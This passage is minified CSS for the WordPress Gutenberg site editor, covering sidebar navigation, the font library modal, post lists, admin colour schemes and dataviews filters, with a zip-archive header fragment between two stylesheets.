(prefers-reduced-motion:reduce){.edit-site-sidebar__screen-wrapper{animation-duration:0s}}.edit-site-sidebar__screen-wrapper.slide-from-left{animation-name:local--slide-from-left}.edit-site-sidebar__screen-wrapper.slide-from-right{animation-name:local--slide-from-right}.edit-site-sidebar-button{color:#e0e0e0;flex-shrink:0}.edit-site-sidebar-button:focus:not(:disabled){box-shadow:none;outline:none}.edit-site-sidebar-button:focus-visible:not(:disabled){box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:3px solid #0000}.edit-site-sidebar-button:focus,.edit-site-sidebar-button:focus-visible,.edit-site-sidebar-button:hover:not(:disabled,[aria-disabled=true]),.edit-site-sidebar-button:not(:disabled,[aria-disabled=true]):active,.edit-site-sidebar-button[aria-expanded=true]{color:#f0f0f0}.edit-site-sidebar-navigation-item.components-item{border:none;color:#949494;min-height:40px;padding:8px 16px 8px 6px}.edit-site-sidebar-navigation-item.components-item:focus,.edit-site-sidebar-navigation-item.components-item:hover,.edit-site-sidebar-navigation-item.components-item[aria-current=true]{color:#e0e0e0}.edit-site-sidebar-navigation-item.components-item:focus .edit-site-sidebar-navigation-item__drilldown-indicator,.edit-site-sidebar-navigation-item.components-item:hover .edit-site-sidebar-navigation-item__drilldown-indicator,.edit-site-sidebar-navigation-item.components-item[aria-current=true] .edit-site-sidebar-navigation-item__drilldown-indicator{fill:#e0e0e0}.edit-site-sidebar-navigation-item.components-item[aria-current=true]{background:#2f2f2f;color:#fff;font-weight:500}.edit-site-sidebar-navigation-item.components-item:focus-visible{transform:translateZ(0)}.edit-site-sidebar-navigation-item.components-item .edit-site-sidebar-navigation-item__drilldown-indicator{fill:#949494}.edit-site-sidebar-navigation-item.components-item.with-suffix{padding-left:16px}.edit-site-sidebar-navigation-screen__content .block-editor-list-view-block-select-button{cursor:grab;padding:8px 0 8px 8px}.edit-site-sidebar-navigation-screen{display:flex;flex-direction:column;overflow-x:unset!important;position:relative}.edit-site-sidebar-navigation-screen__main{flex-grow:1;margin-bottom:16px}.edit-site-sidebar-navigation-screen__main.has-footer{margin-bottom:0}.edit-site-sidebar-navigation-screen__content{padding:0 16px}.edit-site-sidebar-navigation-screen__content .components-text{color:#ccc}.edit-site-sidebar-navigation-screen__content .components-heading{margin-bottom:8px}.edit-site-sidebar-navigation-screen__title-icon{background:#1e1e1e;margin-bottom:8px;padding-bottom:8px;padding-top:48px;position:sticky;top:0;z-index:1}.edit-site-sidebar-navigation-screen__title{flex-grow:1;overflow-wrap:break-word}.edit-site-sidebar-navigation-screen__title.edit-site-sidebar-navigation-screen__title,.edit-site-sidebar-navigation-screen__title.edit-site-sidebar-navigation-screen__title .edit-site-sidebar-navigation-screen__title{line-height:32px}.edit-site-sidebar-navigation-screen__actions{display:flex;flex-shrink:0}@media (min-width:782px){.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variation-container{max-width:292px}}.edit-site-global-styles-variation-title{color:#ddd;font-size:11px;font-weight:500;text-transform:uppercase}.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{outline-color:#ffffff0d}.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item:not(.is-active):hover .edit-site-global-styles-variations_item-preview{outline-color:#ffffff26}.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item.is-active .edit-site-global-styles-variations_item-preview{outline-color:#fff}.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{outline-color:var(--wp-admin-theme-color)}.edit-site-sidebar-navigation-screen__footer{background-color:#1e1e1e;border-top:1px solid #2f2f2f;bottom:0;gap:0;margin:16px 0 0;padding:8px 16px;position:sticky}.edit-site-sidebar-navigation-screen__footer .edit-site-sidebar-navigation-screen-details-footer{margin-left:-16px;margin-right:-16px}.edit-site-sidebar-navigation-screen__input-control{width:100%}.edit-site-sidebar-navigation-screen__input-control .components-input-control__container{background:#2f2f2f}.edit-site-sidebar-navigation-screen__input-control .components-input-control__container .components-button{color:#e0e0e0!important}.edit-site-sidebar-navigation-screen__input-control .components-input-control__input{background:#2f2f2f!important;color:#e0e0e0!important}.edit-site-sidebar-navigation-screen__input-control .components-input-control__backdrop{border:4px!important}.edit-site-sidebar-navigation-screen__input-control .components-base-control__help{color:#949494}.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item:focus,.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item:hover,.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item[aria-current]{background:none}.sidebar-navigation__more-menu .components-button{color:#e0e0e0}.sidebar-navigation__more-menu .components-button:focus,.sidebar-navigation__more-menu .components-button:hover,.sidebar-navigation__more-menu .components-button[aria-current]{color:#f0f0f0}.edit-site-sidebar-navigation-screen-patterns__group{margin-bottom:24px;margin-left:-16px;margin-right:-16px}.edit-site-sidebar-navigation-screen-patterns__group:last-of-type{border-bottom:0;margin-bottom:0;padding-bottom:0}.edit-site-sidebar-navigation-screen-patterns__group-header{margin-top:16px}.edit-site-sidebar-navigation-screen-patterns__group-header p{color:#949494}.edit-site-sidebar-navigation-screen-patterns__group-header h2{font-size:11px;font-weight:500;text-transform:uppercase}.edit-site-sidebar-navigation-screen-patterns__divider{border-top:1px solid #2f2f2f;margin:16px 0}.edit-site-sidebar-navigation-screen__description{margin:0 0 32px}.edit-site-sidebar-navigation-screen-navigation-menus{margin-left:-16px;margin-right:-16px}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-leaf .block-editor-list-view-block-contents{white-space:normal}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__title{margin-top:3px}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu-cell{padding-left:0}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button{color:#949494}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button:focus,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button:hover,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button[aria-current]{color:#fff}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu{color:#949494}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu:focus,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu:hover{color:#fff}.edit-site-sidebar-navigation-screen-navigation-menus__loading.components-spinner{display:block;margin-left:auto;margin-right:auto}.edit-site-sidebar-navigation-screen-navigation-menus__helper-block-editor{display:none}.edit-site-sidebar-dataviews,.edit-site-sidebar-navigation-screen-main,.edit-site-sidebar-navigation-screen-templates-browse{margin-left:-16px;margin-right:-16px}.edit-site-sidebar-dataviews-dataview-item{border-radius:2px}.edit-site-sidebar-dataviews-dataview-item:focus,.edit-site-sidebar-dataviews-dataview-item:hover,.edit-site-sidebar-dataviews-dataview-item[aria-current]{color:#e0e0e0}.edit-site-sidebar-dataviews-dataview-item.is-selected{background:#2f2f2f;color:#fff;font-weight:500}.edit-site-site-hub{align-items:center;display:flex;gap:8px;height:64px;justify-content:space-between;margin-left:12px}.edit-site-site-hub__actions{flex-shrink:0}.edit-site-site-hub__view-mode-toggle-container{flex-shrink:0;height:64px;width:64px}.edit-site-site-hub__view-mode-toggle-container.has-transparent-background .edit-site-layout__view-mode-toggle-icon{background:#0000}.edit-site-site-hub__title .components-button{color:#e0e0e0;display:block;flex-grow:1;font-size:15px;font-weight:500;margin-right:-4px;overflow:hidden;padding-left:16px;position:relative;text-decoration:none;text-overflow:ellipsis;white-space:nowrap}.edit-site-site-hub__title .components-button:active,.edit-site-site-hub__title .components-button:focus,.edit-site-site-hub__title .components-button:hover{color:#e0e0e0}.edit-site-site-hub__title .components-button:focus{box-shadow:none;outline:none}.edit-site-site-hub__title .components-button:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #1e1e1e,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:2px}.edit-site-site-hub__title .components-button:after{content:"↗";font-weight:400;left:0;opacity:0;position:absolute}@media not (prefers-reduced-motion){.edit-site-site-hub__title .components-button:after{transition:opacity .1s linear}}.edit-site-site-hub__title .components-button:active:after,.edit-site-site-hub__title .components-button:focus:after,.edit-site-site-hub__title .components-button:hover:after{opacity:1}.edit-site-site-hub_toggle-command-center{color:#e0e0e0}.edit-site-site-hub_toggle-command-center:active svg,.edit-site-site-hub_toggle-command-center:hover svg{fill:#f0f0f0}.edit-site-site-icon__icon{fill:currentColor;height:100%;width:100%}.edit-site-layout.is-full-canvas .edit-site-site-icon__icon{padding:12px}.edit-site-site-icon__image{aspect-ratio:1/1;background:#333;height:100%;object-fit:cover;width:100%}.edit-site-layout.is-full-canvas .edit-site-site-icon__image{border-radius:0}.edit-site-editor__view-mode-toggle button:focus{position:relative}.edit-site-editor__view-mode-toggle button:focus:before{bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff;content:"";display:block;left:0;position:absolute;right:0;top:0;z-index:1}.edit-site-style-book{height:100%}.edit-site-style-book.is-button{border-radius:8px}.edit-site-style-book{align-items:stretch;display:flex;flex-direction:column}.edit-site-style-book__iframe{display:block;height:100%;width:100%}.edit-site-style-book__iframe.is-button{border-radius:8px}.edit-site-style-book__iframe.is-focused{outline:calc(var(--wp-admin-border-width-focus)*2) solid var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-2)}.edit-site-style-book__tablist-container{background:#fff;display:flex;flex:none;padding-left:56px;width:100%}.edit-site-style-book__tabpanel{flex:1 0 auto;overflow:auto}.edit-site-editor-canvas-container{background-color:var(--wp-editor-canvas-background);height:100%}.edit-site-editor-canvas-container iframe{display:block;height:100%;width:100%}.edit-site-layout.is-full-canvas .edit-site-editor-canvas-container{padding:24px 24px 0}.edit-site-editor-canvas-container__section{background:#fff;border-radius:8px;bottom:0;left:0;overflow:hidden;position:absolute;right:0;top:0}@media not (prefers-reduced-motion){.edit-site-editor-canvas-container__section{transition:all .3s}}.edit-site-editor-canvas-container__close-button{background:#fff;left:8px;position:absolute;top:8px;z-index:2}.edit-site-post-edit{padding:24px}.dataforms-layouts-panel__field-dropdown .fields-controls__password{border-top:1px solid #e0e0e0;padding-top:16px}.edit-site-post-list__featured-image{height:100%;object-fit:cover;width:100%}.edit-site-post-list__featured-image-wrapper{border-radius:4px;height:100%;width:100%}.edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)){background-color:#f0f0f0;border-radius:4px;display:block;flex-grow:0!important;height:32px;overflow:hidden;position:relative;width:32px}.edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button:after,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)):after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;position:absolute;right:0;top:0;width:100%}.edit-site-post-list__featured-image-button{background-color:unset;border:none;border-radius:4px;box-shadow:none;box-sizing:border-box;cursor:pointer;height:100%;overflow:hidden;padding:0;width:100%}.edit-site-post-list__featured-image-button:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-view-grid__card.is-selected .edit-site-post-list__featured-image-button:after{background:rgba(var(--wp-admin-theme-color--rgb),.04);box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.edit-site-post-list__status-icon{height:24px;width:24px}.edit-site-post-list__status-icon svg{fill:currentColor;margin-right:-4px}.edit-site-resizable-frame__inner{position:relative}body:has(.edit-site-resizable-frame__inner.is-resizing){cursor:col-resize;user-select:none;-webkit-user-select:none}.edit-site-resizable-frame__inner.is-resizing:before{content:"";inset:0;position:absolute;z-index:1}.edit-site-resizable-frame__inner-content{inset:0;position:absolute;z-index:0}.edit-site-resizable-frame__handle{align-items:center;background-color:#75757566;border:0;border-radius:4px;cursor:col-resize;display:flex;height:64px;justify-content:flex-end;padding:0;position:absolute;top:calc(50% - 32px);width:4px;z-index:100}.edit-site-resizable-frame__handle:before{content:"";height:100%;position:absolute;right:100%;width:32px}.edit-site-resizable-frame__handle:after{content:"";height:100%;left:100%;position:absolute;width:32px}.edit-site-resizable-frame__handle:focus-visible{outline:2px solid #0000}.edit-site-resizable-frame__handle.is-resizing,.edit-site-resizable-frame__handle:focus,.edit-site-resizable-frame__handle:hover{background-color:var(--wp-admin-theme-color)}.edit-site-push-changes-to-global-styles-control .components-button{justify-content:center;width:100%}@media (min-width:782px){.font-library-modal.font-library-modal{width:65vw}}.font-library-modal .components-modal__header{border-bottom:none}.font-library-modal .components-modal__content{margin-bottom:70px;padding-top:0}.font-library-modal .font-library-modal__subtitle{font-size:11px;font-weight:500;text-transform:uppercase}.font-library-modal .components-navigator-screen{padding:3px}.font-library-modal__tabpanel-layout{margin-top:32px}.font-library-modal__tabpanel-layout .font-library-modal__loading{align-items:center;display:flex;height:100%;justify-content:center;padding-top:124px;position:absolute;right:0;top:0;width:100%}.font-library-modal__footer{background-color:#fff;border-top:1px solid #ddd;bottom:32px;height:70px;margin:0 -32px -32px;padding:16px 32px;position:absolute;width:100%}.font-library-modal__page-selection{font-size:11px;font-weight:500;text-transform:uppercase}@media (min-width:600px){.font-library-modal__page-selection .components-select-control__input{font-size:11px!important;font-weight:500}}.font-library-modal__fonts-title{font-size:11px;font-weight:600;margin-bottom:0;margin-top:0;text-transform:uppercase}.font-library-modal__fonts-list{margin-bottom:0;margin-top:0}.font-library-modal__fonts-list-item{margin-bottom:0}.font-library-modal__font-card{border:1px solid #e0e0e0;height:auto!important;margin-top:-1px;padding:16px;width:100%}.font-library-modal__font-card:hover{background-color:#f0f0f0}.font-library-modal__font-card:focus{position:relative}.font-library-modal__font-card .font-library-modal__font-card__name{font-weight:700}.font-library-modal__font-card .font-library-modal__font-card__count{color:#757575}.font-library-modal__font-card .font-library-modal__font-variant_demo-image{display:block;height:24px;width:auto}.font-library-modal__font-card .font-library-modal__font-variant_demo-text{flex-shrink:0;white-space:nowrap}@media not (prefers-reduced-motion){.font-library-modal__font-card .font-library-modal__font-variant_demo-text{transition:opacity .3s ease-in-out}}.font-library-modal__font-variant{border-bottom:1px solid #e0e0e0;padding-bottom:16px}.font-library-modal__tablist-container{background:#fff;border-bottom:1px solid #ddd;margin:0 -32px;padding:0 16px;position:sticky;top:0;z-index:1}.font-library-modal__tablist-container [role=tablist]{margin-bottom:-1px}.font-library-modal__upload-area{align-items:center;display:flex;height:256px!important;justify-content:center;width:100%}button.font-library-modal__upload-area{background-color:#f0f0f0}.font-library-modal__local-fonts{margin:0 auto;width:80%}.font-library-modal__local-fonts .font-library-modal__upload-area__text{color:#757575}.font-library__google-fonts-confirm{align-items:center;display:flex;justify-content:center;margin-top:64px}.font-library__google-fonts-confirm p{line-height:1.4}.font-library__google-fonts-confirm h2{font-size:1.2rem;font-weight:400}.font-library__google-fonts-confirm .components-card{padding:16px;width:400px}.font-library__google-fonts-confirm .components-button{justify-content:center;width:100%}.font-library-modal__select-all{padding:16px 17px 16px 16px}.font-library-modal__select-all .components-checkbox-control__label{padding-right:16px}.edit-site-pagination .components-button.is-tertiary{height:32px;justify-content:center;width:32px}.edit-site-global-styles-variations_item{box-sizing:border-box;cursor:pointer}.edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{border-radius:2px;outline:1px solid #0000001a;outline-offset:-1px;overflow:hidden;position:relative}@media not (prefers-reduced-motion){.edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{transition:outline .1s linear}}.edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview.is-pill{height:32px}.edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview.is-pill .block-editor-iframe__scale-container{overflow:hidden}.edit-site-global-styles-variations_item:not(.is-active):hover .edit-site-global-styles-variations_item-preview{outline-color:#0000004d}.edit-site-global-styles-variations_item.is-active .edit-site-global-styles-variations_item-preview,.edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{outline-color:#1e1e1e;outline-offset:1px;outline-width:var(--wp-admin-border-width-focus)}.edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{outline-color:var(--wp-admin-theme-color)}.edit-site-styles .edit-site-global-styles-screen-root{box-shadow:none}.edit-site-styles .edit-site-global-styles-screen-root>div>hr{display:none}.edit-site-styles .edit-site-global-styles-sidebar__navigator-provider .components-tools-panel{border-top:none}.edit-site-styles .edit-site-global-styles-sidebar__navigator-provider{overflow-y:auto;padding-left:0;padding-right:0}.edit-site-styles .edit-site-global-styles-sidebar__navigator-provider .edit-site-global-styles-sidebar__navigator-screen{outline:none;padding:12px}.edit-site-styles .edit-site-sidebar-button{color:#1e1e1e}::view-transition-image-pair(root){isolation:auto}::view-transition-new(root),::view-transition-old(root){animation:none;display:block;mix-blend-mode:normal}body.js #wpadminbar{display:none}body.js #wpbody{padding-top:0}body.js.appearance_page_gutenberg-template-parts,body.js.site-editor-php{background:#fff}body.js.appearance_page_gutenberg-template-parts #wpcontent,body.js.site-editor-php #wpcontent{padding-right:0}body.js.appearance_page_gutenberg-template-parts #wpbody-content,body.js.site-editor-php #wpbody-content{padding-bottom:0}body.js.appearance_page_gutenberg-template-parts #wpbody-content>div:not(.edit-site):not(#screen-meta),body.js.appearance_page_gutenberg-template-parts #wpfooter,body.js.site-editor-php #wpbody-content>div:not(.edit-site):not(#screen-meta),body.js.site-editor-php #wpfooter{display:none}body.js.appearance_page_gutenberg-template-parts .a11y-speak-region,body.js.site-editor-php .a11y-speak-region{right:-1px;top:-1px}body.js.appearance_page_gutenberg-template-parts ul#adminmenu a.wp-has-current-submenu:after,body.js.appearance_page_gutenberg-template-parts ul#adminmenu>li.current>a.current:after,body.js.site-editor-php ul#adminmenu a.wp-has-current-submenu:after,body.js.site-editor-php ul#adminmenu>li.current>a.current:after{border-left-color:#fff}body.js.appearance_page_gutenberg-template-parts .media-frame select.attachment-filters:last-of-type,body.js.site-editor-php .media-frame select.attachment-filters:last-of-type{max-width:100%;width:auto}body.js.site-editor-php{background:#1e1e1e}.edit-site{box-sizing:border-box}.edit-site *,.edit-site :after,.edit-site :before{box-sizing:inherit}.edit-site{height:100vh}@media (min-width:600px){.edit-site{bottom:0;left:0;min-height:100vh;position:fixed;right:0;top:0}}.no-js .edit-site{min-height:0;position:static}.edit-site .interface-interface-skeleton{top:0}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!D(WWdist/edit-site/posts.min.cssnuȯ@charset "UTF-8";:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.dataviews-picker-wrapper,.dataviews-wrapper{box-sizing:border-box;container:dataviews-wrapper/inline-size;display:flex;flex-direction:column;font-size:13px;height:100%;line-height:1.4;overflow:auto;scroll-padding-bottom:64px}.dataviews-filters__container,.dataviews__view-actions{box-sizing:border-box;flex-shrink:0;left:0;padding:16px 48px;position:sticky}@media not (prefers-reduced-motion){.dataviews-filters__container,.dataviews__view-actions{transition:padding .1s ease-out}}.dataviews-loading,.dataviews-no-results{align-items:center;display:flex;flex-grow:1;justify-content:center;padding:0 48px}@media not (prefers-reduced-motion){.dataviews-loading,.dataviews-no-results{transition:padding .1s ease-out}}.dataviews-loading-more{text-align:center}@container (max-width: 430px){.dataviews-filters__container,.dataviews__view-actions{padding:12px 24px}.dataviews-loading,.dataviews-no-results{padding-left:24px;padding-right:24px}}.dataviews-title-field{font-size:13px;font-weight:500;width:100%}.dataviews-title-field,.dataviews-title-field a{color:#2f2f2f;text-overflow:ellipsis;white-space:nowrap}.dataviews-title-field a{display:block;flex-grow:0;overflow:hidden;text-decoration:none}.dataviews-title-field a:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field a:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color,#007cba);color:var(--wp-admin-theme-color--rgb)}.dataviews-title-field button.components-button.is-link{color:#1e1e1e;display:block;font-weight:inherit;overflow:hidden;text-decoration:none;text-overflow:ellipsis;white-space:nowrap;width:100%}.dataviews-title-field button.components-button.is-link:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field--clickable{color:#2f2f2f;cursor:pointer}.dataviews-title-field--clickable:hover{color:var(--wp-admin-theme-color)}.dataviews-title-field--clickable:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color,#007cba);color:var(--wp-admin-theme-color--rgb)}.components-card__body:has(>.dataviews-picker-wrapper),.components-card__body:has(>.dataviews-wrapper){overflow:hidden;padding:8px 0 0}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews__view-actions,.components-card__body:has(>.dataviews-wrapper) .dataviews-filters__container,.components-card__body:has(>.dataviews-wrapper) .dataviews-footer,.components-card__body:has(>.dataviews-wrapper) .dataviews-loading,.components-card__body:has(>.dataviews-wrapper) .dataviews-no-results,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-grid,.components-card__body:has(>.dataviews-wrapper) .dataviews__view-actions{padding-inline:24px}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:first-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:first-child{padding-inline-start:24px}.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-picker-wrapper) .dataviews-view-table tr th:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr td:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:last-child{padding-inline-end:24px}.dataviews-bulk-actions-footer__item-count{color:#1e1e1e;font-size:11px;font-weight:500;text-transform:uppercase}.dataviews-bulk-actions-footer__container{margin-right:auto;min-height:32px}.dataviews-filters__button{position:relative}.dataviews-filters__container{padding-top:0}.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true],.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:hover{opacity:0}.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:focus{opacity:1}.dataviews-filters__summary-popover{font-size:13px;line-height:1.4}.dataviews-filters__summary-popover .components-popover__content{border-radius:4px;max-width:250px;min-width:230px;width:100%}.dataviews-filters__summary-popover.components-dropdown__content .components-popover__content{padding:0}.dataviews-filters__summary-operators-container{padding:8px 16px}.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-listbox),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-no-elements),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__user-input-widget){border-bottom:1px solid #e0e0e0}.dataviews-filters__summary-operators-container:empty{display:none}.dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-name{color:#757575;flex-shrink:0;max-width:calc(100% - 55px);overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-select{overflow:hidden;white-space:nowrap;width:100%}.dataviews-filters__summary-chip-container{position:relative;white-space:pre-wrap}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip{align-items:center;background:#f0f0f0;border:1px solid #0000;border-radius:16px;box-sizing:border-box;color:#2f2f2f;cursor:pointer;display:flex;min-height:32px;padding:4px 12px;position:relative}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable{cursor:default}.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-reset{padding-inline-end:28px}.dataviews-filters__summary-chip-container 